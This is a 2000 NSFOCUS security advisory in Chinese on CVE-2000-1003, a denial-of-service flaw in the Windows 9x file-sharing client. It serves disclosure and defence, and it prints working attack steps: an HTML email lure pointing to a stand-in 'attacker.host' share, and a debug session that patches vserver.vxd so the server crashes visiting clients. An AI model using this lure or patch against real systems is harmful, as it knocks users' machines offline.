首页 -> 安全研究

安全研究

安全公告
绿盟科技安全公告(SA2000-04)

NSFOCUS安全小组(security@nsfocus.com)
http://www.nsfocus.com

Microsoft Windows 9x共享访问客户端类型检测漏洞

发布日期:2000-10-11

CVE ID:CVE-2000-1003

受影响的软件及系统:
====================
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition

综述:
======
NSFOCUS 安全小组发现了微软Windows 9x NETBIOS 客户端存在一个安全漏洞。这个漏洞允许恶意攻击者提供一个修改过的文件共享服务器,当诱使Windows 9x客户访问它的共享资源时,会导致对客户的拒绝服务攻击。

分析:
======
当Windows 9x客户访问文件共享服务时,会比较服务端传来的驱动类型,,如果服务器返回服务类型不是" ?????"、" A:"、" LPT1:"、" COMM"、"IPC"中的一种,客户端就会错误得得到第6种类型,而实际上只有5种,所以进行转换时会得到错误的驱动头指针,从而调用错误的驱动函数地址,造成客户端不稳定甚至崩溃。

恶意用户可以通过构造一封HTML格式的邮件发送给目标用户,例如:

<html>
<body>
hello
<img src="file:\\attacker.host\pub\a.gif">
<body>
</html>

当Windows 9x客户使用outlook express或者其他支持HTML邮件的邮件程序打开这封邮件时,将使客户主动连结恶意用户控制的主机,如果这台主机的共享服务程序已经被攻击者修改过,就可能造成windows 9x客户遭受拒绝服务攻击。

测试方法:
==========
下面提供一个测试方法,操作系统是windows 98 Secondary Edition(英文版):


1. D:\WIN98\SYSTEM>debug vserver.vxd
-d 2b60
1266:2B60  3C 01 75 24 8B C8 C1 E9-10 83 F9 6A 73 05 83 F9   <.u$.......js...
1266:2B70  64 73 1B 83 F9 13 72 10-83 F9 1F 76 0C 80 7F 3E   ds....r....v...>
1266:2B80  05 73 05 83 F9 58 77 21-C3 66 B8 03 38 C3 83 F9   .s...Xw!.f..8...
1266:2B90  65 74 10 83 F9 68 74 32-83 F9 67 75 1B B8 03 38   et...ht2..gu...8
1266:2BA0  1A 00 C3 B8 03 38 1E 00-C3 83 F9 6E 74 10 83 F9   .....8.....nt...
1266:2BB0  70 74 11 83 F9 6C 74 12-B8 03 38 1F 00 C3 B8 01   pt...lt...8.....
1266:2BC0  00 02 00 C3 B8 03 38 27-00 C3 B8 03 38 15 00 C3   ......8'....8...
1266:2BD0  91 FE 48 32 75 0E 83 78-2A 00 74 08 8D 40 2A E8   ..H2u..x*.t..@*.
-n vserver.bak    (备份)
-w
Writing 1B8F8 bytes
-n vserver.vxd
-e 2b60 33 c0 c3
-w
Writing 1B8F8 bytes
-q

2. 重启机器.

3. 为一个共享目录设置一个口令

4. 从其他的Windows 9x机器访问这台主机的那个共享目录,将导致win9x客户机发生蓝屏。系统开始变得不稳定,并可能崩溃。

解决方法:
==========
NSFOCUS建议您不要随意访问不可信主机的共享服务。并禁止通过TCP/IP协议使用NETBIOS程序。

厂商状态:
==========
我们已经将这个问题通报给了微软公司。

声 明
==========

本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。

关于绿盟科技
============

绿盟科技(NSFOCUS Co., Ltd.)是中国网络安全领域的领导企业,致力于网络和系统安全问题的研究、高端网络安全产品的研发、销售与网络安全服务,在入侵检测/保护、远程评估、 DDoS攻击防护等方面提供具有国际竞争能力的先进产品,是国内最具安全服务经验的专业公司。有关绿盟科技的详情请参见: http://www.nsfocus.com

© 2024 绿盟科技